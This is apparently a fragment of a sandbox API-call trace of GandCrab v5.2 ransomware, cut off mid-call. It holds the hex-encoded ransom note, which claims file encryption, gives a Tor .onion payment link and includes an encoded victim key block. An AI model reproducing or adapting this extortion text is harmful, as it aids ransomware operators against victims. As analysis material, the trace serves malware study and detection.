(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.077] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0095.078] CloseHandle (hObject=0x230) returned 1 [0095.078] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.079] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.079] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x190)) [0095.079] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.079] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.079] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.079] wsprintfW (in: param_1=0x1e70000, 